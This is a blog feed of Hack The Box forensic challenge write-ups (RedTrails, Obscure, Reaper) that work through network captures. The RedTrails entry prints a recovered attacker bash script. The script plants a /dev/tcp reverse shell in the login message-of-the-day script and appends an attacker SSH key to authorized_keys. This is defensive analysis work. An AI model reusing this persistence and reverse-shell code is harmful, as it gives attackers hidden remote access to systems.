https://mikehorn-git.github.io/tags/pcap/ Recent content in Pcap on Mike.Horn Hugo en Thu, 10 Oct 2024 00:00:00 +0200 https://mikehorn-git.github.io/writeups/htb/challenges/redtrails/ Thu, 10 Oct 2024 00:00:00 +0200 https://mikehorn-git.github.io/writeups/htb/challenges/redtrails/ <h1 id="introduction">Introduction</h1> <p>The flag is split into <strong>three parts</strong>. In this investigation, we were able to recover <strong>two parts</strong>. We start from a provided <code>.pcap</code> file.</p> <hr> <h1 id="1st-part">1st part</h1> <p>The capture contains <strong>two HTTP frames</strong>. The second frame is large and contains interesting data.</p> <ul> <li>Load the payload in <strong>CyberChef</strong>.</li> <li>Apply <strong>reverse</strong> and <strong>Base64 decode</strong> operations.</li> </ul> <p><img alt="CyberChef" loading="lazy" src="../../writeups/htb/challenges/redtrails/2024-10-08T21:38:10,624043836+02:00.png"></p> <p>After decoding, deobfuscate the <strong>bash script</strong> manually.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="cp">#!/bin/bash </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">lhJVXukWibAFfkv<span class="o">()</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="nb">echo</span> <span class="s1">&#39;bash -c &#34;bash -i &gt;&amp; /dev/tcp/10.10.0.200/1337 0&gt;&amp;1&#34;&#39;</span> &gt; /etc/update-motd.d/00-header </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">x7KG0bvubT6dID2<span class="o">()</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="nb">echo</span> -e <span class="s2">&#34;\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC8Vkq9UTKMakAx2Zq+PnZNc6nYuEK3ZVXxH15bbUeB+elCb3JbVJyBfvAuZ0sonfAqZsyq9Jg6/KGtNsEmtVKXroPXhzFumTgg7Z1NvrUNvnqLIcfxTnP1+/4X284hp0bF2VbITb6oQKgzRdOs8GtOasKaK0k//2E5o0RKIEdrx0aL5HBOGPx0p8GrGe4kRKoAokGXwDVT22LlBylRkA6+x6jZtd2gYhCMgSZ0iM9RyY7k7K13tHXzEk7OciUmd5/Z7Yuolnt3ByX9a+IfLMD/FQNy1B4DYhsY62O7o2xR0vxkBEp5UhBAX8gOTG0wjzrUHxmdUimXgiy39YVZaTJQwLBtzJS//YhkewyF/+CP0H7wIKIErlf5WFK5skLYO6uKVpx6akGXY8GADnPU3iPK/MtBC+RqWssdkGqFIA5xG2Fn+Klid9Obm1uXexJfYVjJMOfvuqtb6KcgLmi5uRkA6+x6jZtd2gYhCMgSZ0iM9RyY7k7K13tHXzEk7OciUmd5/Z7Yuolnt3ByX9a+IlSxaiOAD2iNJboNuUIxMH/9HNYKd6mlwUpovqFcGBqXizcF21bxNGoOE31Vfox2fq2qW30BDWtHrrYi76iLh02FerHEYHdQAAA08NfUHyCw0fVl/qt6bAgKSb02k691lcDAo5JpEEzNQpub0X8xJItrbw==HTB{r3d15_1n574nc35&#34;</span> &gt;&gt; ~/.ssh/authorized_keys </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">hL8FbEfp9L1261G<span class="o">()</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> lhJVXukWibAFfkv </span></span><span class="line"><span class="cl"> x7KG0bvubT6dID2 </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">hL8FbEfp9L1261G </span></span></code></pre></div><p>The script reveals the <strong>first flag</strong> embedded in an <code>ssh-rsa</code> key.</p> https://mikehorn-git.github.io/writeups/htb/challenges/obscure/ Sun, 29 Sep 2024 00:00:00 +0200 https://mikehorn-git.github.io/writeups/htb/challenges/obscure/ <h1 id="introduction">Introduction</h1> <p>We are provided with two files:</p> <ul> <li>A <strong>PCAP file</strong></li> <li>A <strong>PHP file</strong></li> </ul> <hr> <h1 id="pcap-analysis">PCAP Analysis</h1> <p>Start by analyzing the PCAP before fully deobfuscating <code>support.php</code>.</p> <p>Filter for <strong>HTTP POST</strong> requests:</p> <p><img alt="POST" loading="lazy" src="./assets/2024-09-28T23:17:53,862253486+02:00.png"></p> <p>Only <strong>4 POST requests</strong> are present.</p> <p>Follow the HTTP streams to inspect the payloads. You will observe obfuscated strings such as:</p> <blockquote> <p><code>0UlYyJHG87EJqEz66f8af44abea0QKxO/n6DAwXuGEoc5X9/H3HkMXv1Ih75Fx1NdSPRNDPUmHTy351039f4a7b5</code></p> </blockquote> <p><img alt="STREAM" loading="lazy" src="./assets/2024-09-28T23:22:19,040121186+02:00.png"></p> <p>These strings will be used as input for the PHP deobfuscation.</p> <hr> <h1 id="php-analysis">PHP Analysis</h1> <p>The provided PHP script performs multiple layers of obfuscation:</p> https://mikehorn-git.github.io/writeups/htb/sherlocks/reaper/ Sat, 21 Sep 2024 00:00:00 +0200 https://mikehorn-git.github.io/writeups/htb/sherlocks/reaper/ <h1 id="q1-ip-address-of-forela-wkstn001">Q1: IP Address of Forela-Wkstn001</h1> <p>What is the IP address of <strong>Forela-Wkstn001</strong>?</p> <blockquote> <p>🔎 See Q2 for the analysis steps.</p> </blockquote> <hr> <h1 id="q2-ip-address-of-forela-wkstn002">Q2: IP Address of Forela-Wkstn002</h1> <p>What is the IP address of <strong>Forela-Wkstn002</strong>?</p> <p><strong>Note:</strong> NetworkMiner requires <code>.pcap</code> format. Convert the file if needed:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">tshark -F pcap -r ntlmrelay.pcapng -w ntlmrelay.pcap </span></span></code></pre></div><p>Open the capture in <strong>NetworkMiner</strong> to get an overview of network activity. Both workstation IP addresses can be identified here:</p> <p><img alt="NetworkMiner Overview" loading="lazy" src="../../writeups/htb/sherlocks/reaper/2024-09-21T15_32_55,042790459+02_00.png"></p>